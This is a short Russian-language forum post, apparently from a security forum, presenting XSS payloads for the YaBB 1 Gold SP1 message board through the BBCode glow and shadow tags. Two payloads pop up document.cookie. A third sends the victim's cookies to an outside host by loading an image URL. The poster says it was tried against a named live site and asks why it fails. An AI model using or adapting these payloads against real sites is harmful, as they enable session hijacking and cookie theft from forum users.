13.12.2005, 00:18
|
|
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821
Репутация:
83
|
|
Уязвимость, YaBB 1 Gold - SP1, XSS атака.
Код:
[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]
или
Код:
[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]
Что не так в этом коде, проверял на http://www.mgapi.ru/cgi-bin/yabb/
Код:
[glow=red);background:url(javascript:img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie);filter:glow(color=red,2,300]Big Exploit[/glow]
Последний раз редактировалось Romaxa55; 13.12.2005 в 00:55..
|
|
|